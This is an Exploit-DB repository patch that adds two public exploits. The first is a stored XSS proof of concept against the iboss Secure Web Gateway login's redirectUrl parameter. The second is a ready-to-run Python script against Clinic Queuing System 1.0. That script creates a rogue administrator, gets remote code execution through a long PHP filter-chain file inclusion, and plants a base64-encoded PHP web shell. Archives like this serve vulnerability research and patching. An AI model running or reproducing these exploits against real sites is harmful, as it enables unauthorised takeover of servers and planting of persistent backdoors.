From edacab1df2f0be276c1adbbeb4f716f0d0e9718c Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Thu, 9 May 2024 00:16:23 +0000 Subject: [PATCH] DB: 2024-05-09 3 changes to exploits/shellcodes/ghdb iboss Secure Web Gateway - Stored Cross-Site Scripting (XSS) Clinic Queuing System 1.0 - RCE --- exploits/multiple/webapps/52009.txt | 43 +++++++++++++++++ exploits/php/webapps/52008.py | 71 +++++++++++++++++++++++++++++ files_exploits.csv | 2 + 3 files changed, 116 insertions(+) create mode 100644 exploits/multiple/webapps/52009.txt create mode 100755 exploits/php/webapps/52008.py diff --git a/exploits/multiple/webapps/52009.txt b/exploits/multiple/webapps/52009.txt new file mode 100644 index 0000000000..9297ff4317 --- /dev/null +++ b/exploits/multiple/webapps/52009.txt @@ -0,0 +1,43 @@ +# Exploit Title: iboss Secure Web Gateway - Stored Cross-Site Scripting (XSS) +# Date: 4/4/2024 +# Exploit Author: modrnProph3t +# Vendor Homepage: https://www.iboss.com +# Version: < 10.2.0 +# CVE-2024-3378 +# Reference: https://github.com/modrnProph3t/CVE/blob/main/CVE-2024-3378.md + + +## Description +A stored Cross Site Scripting (XSS) vulnerability was found in the iboss Secure Web Gateway product. The vulnerability is exploited by submitting a login attempt, intercepting the request, and adding a payload to the ÒredirectUrlÓ parameter before sending it to the server. After submitting the request, visiting the initial login page will cause the website to load, including the previously submitted payload. + +This is an unauthenticated attack (credentials do not need to be valid) and the payload is stored on the server and included in every response to a GET request for the login page until a new POST request is made to the server without a payload included. + +## Proof of Conept +1. Access the login portal located at /login + + +2. Submit login attempt and intercept the request + +Example of unaltered request: +``` +POST /user_login_submit HTTP/1.1 +Host: +<--Headers Removed--> + +userName=TEST&x=TEST&action=login&redirectUrl= +``` + + +3. Insert XSS payload into the "redirectUrl" parameter + +Example of request with inserted payload: +``` +POST /user_login_submit HTTP/1.1 +Host: +<--Headers Removed--> + +userName=TEST&x=TEST&action=login&redirectUrl="> +``` + + +4. After failed login attempt, return to the initial login page at the /login endpoint and observe payload execution \ No newline at end of file diff --git a/exploits/php/webapps/52008.py b/exploits/php/webapps/52008.py new file mode 100755 index 0000000000..f452803c08 --- /dev/null +++ b/exploits/php/webapps/52008.py @@ -0,0 +1,71 @@ +# Exploit Title: Clinic Queuing System 1.0 RCE +# Date: 2024/1/7 +# Exploit Author: Juan Marco Sanchez +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/16439/clinic-queuing-system-using-php-and-sqlite3-source-code-free-download.html +# Version: 1.0 +# Tested on: Debian Linux Apache Web Server +# CVE: CVE-2024-0264 and CVE-2024-0265 + +import requests +import random +import argparse +from bs4 import BeautifulSoup + +parser = argparse.ArgumentParser() +parser.add_argument("target") +args = parser.parse_args() + +base_url = args.target +phase1_url = base_url + '/LoginRegistration.php?a=save_user' +phase2_url = base_url + '/LoginRegistration.php?a=login' + +filter_chain = "php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=home" + +def phase1(): # CVE-2024-0264 + rand_user = 'pwn_'+str(random.randint(100, 313)) + rand_pass = 'pwn_'+str(random.randint(100, 313)) + pwn_user_data = {'formToken':'','fullname':'pwn!','username':rand_user,'password':rand_pass,'status':1,'type':1} + print("[*] adding administrator " + rand_user + ":" + rand_pass) + phase1 = requests.post(phase1_url, pwn_user_data) + if "User Account has been added successfully." in phase1.text: + print("[+] Phase 1 Success - Admin user added!\n") + print("[*] Initiating Phase 2") + phase2(rand_user, rand_pass) + else: + print("[X] user creation failed :(") + die() + +def phase2(user, password): # CVE-2024-0265 + s = requests.Session(); + login_data = {'formToken':'','username':user, 'password':password} + print("[*] Loggin in....") + phase2 = s.post(phase2_url, login_data) + + if "Login successfully." in phase2.text: + print("[+] Login success") + else: + print("[X] Login failed.") + die() + + print("[+] Preparing for RCE via LFI PHP FIlter Chaining...\n") + rce_url = base_url + "/?page=" + filter_chain + "&0=echo '|jmrcsnchz|
'.shell_exec('id').'
';" + #print("[*] Payload: " + rce_url) + rce = s.get(rce_url) + + if "jmrcsnchz" in rce.text: + print("[+] RCE success!") + soup = BeautifulSoup(rce.text, 'html.parser') + print("[+] Output of id: " + soup.pre.get_text()) + print("[*] Uploading php backdoor....") + s.get(base_url + "/?page=" + filter_chain + "&0=file_put_contents('rce.php',base64_decode('PD89YCRfR0VUWzBdYD8%2b'));") + print("[+] Access at " + base_url + "/rce.php?0=whoami") + else: + print("[X] Exploit failed. Try debugging the script or pass this script onto a proxy to investigate.") + die() + +try: + print("[*] Initiating Phase 1") + phase1() +except: + print("Exploit failed.") \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 5a6e81e8c5..2a9ea76a7d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11948,6 +11948,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 32908,exploits/multiple/webapps/32908.txt,"IBM Tivoli Continuous Data Protection for Files 3.1.4.0 - Cross-Site Scripting",2009-04-14,"Abdul-Aziz Hariri",webapps,multiple,,2009-04-14,2014-04-16,1,CVE-2009-1334;OSVDB-53651,,,,,https://www.securityfocus.com/bid/34513/info 32576,exploits/multiple/webapps/32576.txt,"IBM Tivoli Netcool Service Quality Manager - Cross-Site Scripting / HTML Injection",2008-11-10,"Francesco Bianchino",webapps,multiple,,2008-11-10,2014-03-29,1,,,,,,https://www.securityfocus.com/bid/32233/info 17404,exploits/multiple/webapps/17404.txt,"IBM Websphere Application Server 7.0.0.13 - Cross-Site Request Forgery",2011-06-15,"Core Security",webapps,multiple,,2011-06-15,2011-06-15,1,CVE-2010-3271;OSVDB-73052,,,,,http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=Finding_bugs_and_publishing_advisories +52009,exploits/multiple/webapps/52009.txt,"iboss Secure Web Gateway - Stored Cross-Site Scripting (XSS)",2024-05-08,modrnProph3t,webapps,multiple,,2024-05-08,2024-05-08,0,,,,,, 49148,exploits/multiple/webapps/49148.txt,"ILIAS Learning Management System 4.3 - SSRF",2020-12-02,Dot,webapps,multiple,,2020-12-02,2020-12-02,0,,,,,, 10630,exploits/multiple/webapps/10630.txt,"ImageVue 2.0 - Remote Admin Login",2009-12-24,Sora,webapps,multiple,,2009-12-23,,1,,,,,, 28854,exploits/multiple/webapps/28854.txt,"Imperva SecureSphere Web Application Firewall MX 9.5.6 - Blind SQL Injection",2013-10-10,"Giuseppe D'Amore",webapps,multiple,,2013-10-10,2013-10-10,0,OSVDB-98372,,,,, @@ -15888,6 +15889,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50439,exploits/php/webapps/50439.py,"Clinic Management System 1.0 - SQL injection to Remote Code Execution",2021-10-22,"Pablo Santiago",webapps,php,,2021-10-22,2021-11-29,0,,,,,, 48544,exploits/php/webapps/48544.txt,"Clinic Management System 1.0 - Unauthenticated Remote Code Execution",2020-06-04,BKpatron,webapps,php,,2020-06-04,2020-06-04,0,,,,,, 46642,exploits/php/webapps/46642.txt,"Clinic Pro v4 - 'month' SQL Injection",2019-04-03,"Abdullah Çelebi",webapps,php,80,2019-04-03,2019-04-03,0,,"SQL Injection (SQLi)",,,, +52008,exploits/php/webapps/52008.py,"Clinic Queuing System 1.0 - RCE",2024-05-08,"Juan Marco Sanchez",webapps,php,,2024-05-08,2024-05-08,0,,,,,, 51779,exploits/php/webapps/51779.txt,"Clinic's Patient Management System 1.0 - Unauthenticated RCE",2024-02-05,"Oğulcan Hami Gül",webapps,php,,2024-02-05,2024-02-05,0,,,,,, 9255,exploits/php/webapps/9255.txt,"Clip Bucket 1.7.1 - Insecure Cookie Handling",2009-07-24,Qabandi,webapps,php,,2009-07-23,,1,,,,,, 12383,exploits/php/webapps/12383.txt,"clipak - Arbitrary File Upload",2010-04-25,indoushka,webapps,php,,2010-04-24,,1,,,,,,